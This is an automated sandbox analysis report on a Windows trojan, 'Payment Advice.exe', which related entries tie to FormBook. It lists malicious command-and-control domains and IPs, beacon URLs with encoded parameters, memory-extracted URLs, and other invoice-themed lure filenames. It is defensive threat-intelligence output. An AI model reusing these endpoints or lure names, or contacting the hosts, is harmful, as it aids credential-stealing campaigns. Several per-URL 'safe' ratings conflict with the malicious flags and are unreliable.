http://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.networksolutions.com/	0%	Virustotal		Browse
https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/?kbRxoVY0=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&DnUL=_290s	100%	Avira URL Cloud	malware
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	1%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/	2%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.dmtxwuatbz.cc	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/piwik.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.sandranoll.com	213.145.228.16	true	true	11%, Virustotal, Browse	unknown
www.dmtxwuatbz.cc	172.67.210.102	true	true	2%, Virustotal, Browse	unknown
www.xn--matfrmn-jxa4m.se	194.9.94.85	true	true	0%, Virustotal, Browse	unknown
www.catherineviskadi.com	217.160.0.106	true	true	1%, Virustotal, Browse	unknown
www.anuts.top	23.251.54.212	true	true	7%, Virustotal, Browse	unknown
www.bfiworkerscomp.com	208.91.197.27	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	0%, Virustotal, Browse	unknown
www.telwisey.info	199.192.19.19	true	true	2%, Virustotal, Browse	unknown
www.hprlz.cz	5.44.111.162	true	true	1%, Virustotal, Browse	unknown
www.xn--fhq1c541j0zr.com	43.252.167.188	true	true	0%, Virustotal, Browse	unknown
www.fourgrouw.cfd	unknown	unknown	true		unknown
www.hatercoin.online	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.tinmapco.com	unknown	unknown	true		unknown
www.gipsytroya.com	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.helpers-lion.online	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.xn--fhq1c541j0zr.com/rm91/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/xzzi/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/?kbRxoVY0=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&DnUL=_290s	true	Avira URL Cloud: safe	unknown
http://www.telwisey.info/ei85/?kbRxoVY0=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&DnUL=_290s	true	Avira URL Cloud: safe	unknown
http://www.xn--fhq1c541j0zr.com/rm91/?DnUL=_290s&kbRxoVY0=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=	true	Avira URL Cloud: safe	unknown
http://www.catherineviskadi.com/qe66/?kbRxoVY0=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&DnUL=_290s	true	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/	true	Avira URL Cloud: safe	unknown
http://www.gipsytroya.com/tf44/?kbRxoVY0=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&DnUL=_290s	true	Avira URL Cloud: malware	unknown
http://www.sandranoll.com/aroo/	true	Avira URL Cloud: malware	unknown
http://www.gipsytroya.com/tf44/	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.bfiworkerscomp.com/xzzi/?DnUL=_290s&kbRxoVY0=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=	true	Avira URL Cloud: safe	unknown
http://www.anuts.top/li0t/?DnUL=_290s&kbRxoVY0=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=	true	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/?DnUL=_290s&kbRxoVY0=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=	true	Avira URL Cloud: malware	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.telwisey.info/ei85/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=	true	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?kbRxoVY0=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&DnUL=_290s	true	Avira URL Cloud: malware	unknown
http://www.catherineviskadi.com/qe66/	true	Avira URL Cloud: safe	unknown
http://www.anuts.top/li0t/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dts.gnpge.com	dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	clip.exe, 00000003.00000002.4100415517.000000000552C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	clip.exe, 00000003.00000002.4100415517.0000000005D06000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000039D6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-72.png	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH	clip.exe, 00000003.00000002.4100415517.0000000004EE4000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000002BB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.0000000024B44000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	clip.exe, 00000003.00000002.4100415517.0000000005D06000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000039D6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png	clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-114.png	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.networksolutions.com/	clip.exe, 00000003.00000002.4100415517.000000000552C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH	clip.exe, 00000003.00000002.4100415517.0000000004EE4000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000002BB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.0000000024B44000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf	clip.exe, 00000003.00000002.4100415517.000000000552C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif	clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	clip.exe, 00000003.00000002.4100415517.0000000005D06000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000039D6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc	dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4101406394.0000000004C61000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png	clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/piwik.png	clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.251.54.212	www.anuts.top	United States	62468	VPSQUANUS	true
172.67.210.102	www.dmtxwuatbz.cc	United States	13335	CLOUDFLARENETUS	true
213.145.228.16	www.sandranoll.com	Austria	25575	DOMAINTECHNIKAT	true
194.9.94.85	www.xn--matfrmn-jxa4m.se	Sweden	39570	LOOPIASE	true
5.44.111.162	www.hprlz.cz	Germany	45031	PROVIDERBOXIPv4IPv6DUS1DE	true
217.160.0.106	www.catherineviskadi.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
208.91.197.27	www.bfiworkerscomp.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
199.192.19.19	www.telwisey.info	United States	22612	NAMECHEAP-NETUS	true
43.252.167.188	www.xn--fhq1c541j0zr.com	Hong Kong	38277	CLINK-AS-APCommuniLinkInternetLimitedHK	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500922
Start date and time:	2024-08-29 05:22:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Advice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@15/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 59 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, PID 772 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:23:50	API Interceptor	12081329x Sleep call for process: clip.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.251.54.212	proforma invoice.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	shipping documents.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/d5fo/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/
	BL7247596940.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
172.67.210.102	proforma invoice.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
	shipping documents.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
213.145.228.16	proforma invoice.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
